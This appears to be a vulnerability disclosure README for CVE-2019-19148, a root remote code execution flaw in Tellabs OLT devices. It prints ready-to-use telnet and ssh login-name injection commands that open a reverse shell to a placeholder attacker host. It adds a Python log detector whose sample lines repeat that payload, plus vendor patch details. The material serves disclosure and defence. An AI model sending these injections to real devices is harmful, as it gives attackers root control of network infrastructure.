ellwoodthewood/tellabs_rce

tellabs_rce CVE-2019-19148 [updated information from the vendor at the bottom]

Tellabs OLT RCE

During a recent penetration test, a vulnerability in the way Tellabs handles incoming authentication/authorization was discovered which allowed us to bypass the authentication methods on the Tellabs OLT 1150 device. It is highly suspected that this vulnerability exists in other devices as well.

[Product]

Vendor: Tellabs

Model: MX-IPTV1150

System Version: FP29.2_015873

Release: ONT709.2.50.12

Date: 180722

Steps to reproduce were based on the older Telnet "ShellShock" vulnerability.

The following methods all produced a netcat reverse shell as root. Steps used to exploit:

telnet [OLTHOSTNAME] -l ";EOF() { :;}; /usr/bin/id & /bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1"

The above command asked for the username within the telnet session, and when it timed out, produced the output: "uid=0(emsuser) gid=0(root)" showing that the second portion of the command was not parsed, and the system was vulnerable.

telnet [OLTHOSTNAME] -l "() { :;}; $((/bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1)) /bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1"

The above command was run and produced a reverse 'netcat' style shell to the attacker IP address with a full root bash shell. Again, we suspect the second portion of the command was unnecessary, but due to time constraints, we were unable to test further.

ssh [OLTHOSTNAME] -l "''; /bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1"

After 3 failed authentication attempts, the connect-back to the netcat listener occurs and you are dropped into a root shell. (Contributed by Sandia National Laboratory)

Due to customer concerns with the critical nature of the networking infrastructure, further testing beyond the above was not possible, and the customer immediately contacted the vendor to work on a patch.

Recommendations:

Contact the vendor for a patch

Move management interfaces to a specific VLAN and ensure only the minimum number of personnel can access that interface
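To check whether login attempts of this shape have reached a management interface, the following added example (not part of the original repository) scans authentication log lines for login names carrying the markers seen in the commands above. It assumes OpenSSH-style "Invalid user" / "Failed password for" lines with the username logged unmodified; the sample lines, the host name and the documentation-range addresses are constructed.

```python
import re

# OpenSSH auth-log shapes (assumed log source). The username is matched
# greedily up to the final " from <addr> port <n>" because injected
# usernames contain spaces and a \S+ match would truncate them.
LINE_RE = re.compile(
    r"(?:Invalid user|Failed password for(?: invalid user)?) "
    r"(?P<user>.*) from (?P<src>\S+) port \d+"
)
# Markers seen in the login names on this page: a Shellshock-style function
# definition, bash /dev/tcp redirection, and generic shell metacharacters.
CHECKS = [
    ("function-definition", re.compile(r"\(\)\s*\{")),
    ("dev-tcp-redirect", re.compile(r"/dev/(?:tcp|udp)/")),
    ("shell-metachar", re.compile(r"[;&|`$<>(){}\s'\"]")),
]

def suspicious_logins(lines):
    """Return (source, username, [reasons]) for each flagged login attempt."""
    hits = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        user = m.group("user")
        reasons = [name for name, rx in CHECKS if rx.search(user)]
        if reasons:
            hits.append((m.group("src"), user, reasons))
    return hits

# Constructed sample lines (documentation-range addresses, not real logs).
SAMPLE = [
    "Jan 10 03:12:01 olt sshd[411]: Failed password for invalid user admin from 192.0.2.10 port 50122 ssh2",
    "Jan 10 03:12:09 olt sshd[412]: Invalid user ''; /bin/bash -i >& /dev/tcp/192.0.2.66/4455 0>&1 from 192.0.2.66 port 50130",
    "Jan 10 03:12:15 olt sshd[413]: Failed password for invalid user () { :;}; /usr/bin/id from 192.0.2.66 port 50131 ssh2",
    "Jan 10 03:13:40 olt sshd[420]: Accepted password for emsuser from 192.0.2.20 port 50200 ssh2",
]

if __name__ == "__main__":
    for src, user, reasons in suspicious_logins(SAMPLE):
        print(f"{src}\t{','.join(reasons)}\t{user!r}")
```

A legitimate account name never needs whitespace or shell metacharacters, so any hit on a management VLAN is worth investigating regardless of whether the device is patched.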

[update] From the vendor:

This Vulnerability applies to the following list of versions of the Tellabs 1150, 1134, and 1131 OLT software:

This Vulnerability is resolved in the following software versions of the Tellabs 1150, 1134, and 1131 OLT software: SR30.1 and SR31.1

Tellabs has addressed this issue in the SR30.1 and SR31.1 release on February 18, 2020. These versions are available on the Tellabs Portal.
